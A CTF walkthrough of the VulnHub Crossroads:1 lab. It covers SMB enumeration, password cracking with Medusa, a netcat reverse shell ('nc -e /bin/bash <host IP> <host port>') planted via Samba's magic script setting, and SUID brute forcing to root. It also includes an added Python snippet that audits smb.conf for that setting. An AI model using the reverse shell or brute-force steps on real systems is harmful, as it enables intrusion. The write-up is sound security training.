VulnHub Crossroads:1 is an easy-level boot2root CTF challenge where you have to exploit SMB to obtain user and root access.
Let us begin with finding the IP of the VM.
Then let’s perform a traditional Nmap scan.
You will come across 3 open ports,
- Port 80 - HTTP
- Port 139 - SMB
- Port 445 - SMB
The web application is not a place where you get lucky. I tried different attacks, such as SQL injection on the login and signup forms, but none of them was successful.
Then I tried brute forcing directories.
I could find 2 hidden directories,
Let’s take a look at robots.txt.
It points out another hidden file called crossroads.png, so let’s take a look at that image.
It seems useless. So let’s take a look at the note.txt.
It talks about 3 kings of blues. I did not know what that means, so I Googled it and found the following.
Those names may be a hint on the usernames associated with our machine.
As the web application was useless, let us enumerate SMB shares with enum4linux.
We can find one of the 3 kings of blues; Albert 🙂
Then I tried to crack the password of albert's SMB share.
Using Hydra was a nightmare, as the estimated time was about 40 hours, so I used Medusa instead.
In less than a minute I found the password of albert: bradley1.
So, let’s go ahead and log in to the SMB share using the above credentials.
We can come across 3 files and a directory called smbshare.
Let’s download those 3 files using get command.
Change directory to smbshare and download smb.conf file.
As for now we have 4 files,
Let’s examine the downloaded content one by one.
user.txt contains the first flag.
When we examine the smb.conf file, we can come across the following entries.
There is an entry called magic script = smbscript.sh.
We can create a shell script called smbscript.sh that gives us a reverse connection to the machine.
Just add nc -e /bin/bash <host IP> <host port> to the shell script, which results in a netcat reverse shell when it is executed.
Give read, write and execute permissions for all users to the script.
Then set up a netcat listener.
The magic script is executed in smbshare, so let’s log in to smbshare as albert and upload our smbscript.sh file using the put command.
Take a look at the netcat listener. We are given a reverse shell.
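From the defender's side, the weak point here is the Samba magic script directive itself: Samba runs a file of that name on the server, as the connected user, as soon as a client closes it on the share, so any writable share carrying it is remote code execution for whoever holds the share credentials. The following is an added example, not code from the post or from Samba, that audits an smb.conf for this setting (honouring [global] as the default for every share) and produces a hardened copy; the sample config is constructed and only resembles the one described above.

```python
# Constructed sample in the spirit of the share described above, not the VM's real file.
SAMPLE_SMB_CONF = """\
[smbshare]
   path = /home/albert/smbshare
   magic script = smbscript.sh
   read only = no
"""

def parse_smb_conf(text):
    """Return {section: {key: value}} with keys lower-cased and whitespace normalised."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ';#':
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif '=' in line and current is not None:
            key, value = line.split('=', 1)
            sections[current][' '.join(key.split()).lower()] = value.strip()
    return sections

def is_writable(share):
    """Shares default to read-only; 'writable'/'writeable' override 'read only'."""
    flag = share.get('writable', share.get('writeable'))
    if flag is not None:
        return flag.lower() in ('yes', 'true', '1')
    return share.get('read only', 'yes').lower() in ('no', 'false', '0')

def find_magic_scripts(text):
    """[(share, script, writable)] for each share with a magic script; [global] supplies defaults."""
    sections = parse_smb_conf(text)
    defaults = sections.get('global', {})
    findings = []
    for name, share in sections.items():
        if name != 'global':
            merged = {**defaults, **share}
            if merged.get('magic script'):
                findings.append((name, merged['magic script'], is_writable(merged)))
    return findings

def strip_magic_scripts(text):
    """Hardened copy of the config: magic script/output directives commented out."""
    out = []
    for raw in text.splitlines():
        key = ' '.join(raw.strip().split('=', 1)[0].split()).lower()
        out.append(('; disabled: ' + raw.strip()) if key in ('magic script', 'magic output') else raw)
    return '\n'.join(out) + '\n'
```

Running find_magic_scripts over the sample reports smbshare as a writable share that executes smbscript.sh; after strip_magic_scripts the same audit returns nothing.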
We need to make the received dumb shell stable. You can follow these instructions.
If we take a look at the SUID binaries, we can see that beroot file can be run as root.
Let’s take a look at beroot file.
We can clearly understand that it can be used to become root. So, let’s go ahead and run this file.
It asks for a password which we don’t know.
So far we have examined 3 of the files downloaded from the SMB share. Only the image crossroads.png is left to look into. As this is an image, steganography may be involved. We can use a tool such as stegoveritas to examine the image.
After scanning, it creates a new directory called results, with another directory called keepers inside it. Looking at the first file, we can see that it is a word list. We can try it to crack the password of the beroot file.
Let’s copy it as passwrds.txt to the home directory.
Let’s create a simple http server using python in order to upload our file to the victim.
We can use wget on the victim to fetch the passwrds.txt file.
Now we can write a simple bash script in order to go through our list of passwords and brute force the password of beroot.
Provide execute permissions to the script (chmod +x) and execute it.
Once it completes, we are given another file called rootcreds.
We can obtain the credentials for root by viewing that file.
Let’s go ahead and change user to root, providing above credentials.
VOILA!!! We are root!!!
We can obtain the second flag from the home directory of root.
I hope you enjoyed the challenge and learnt something. Connect with me via LinkedIn.
Best of luck in capturing flags ahead!!!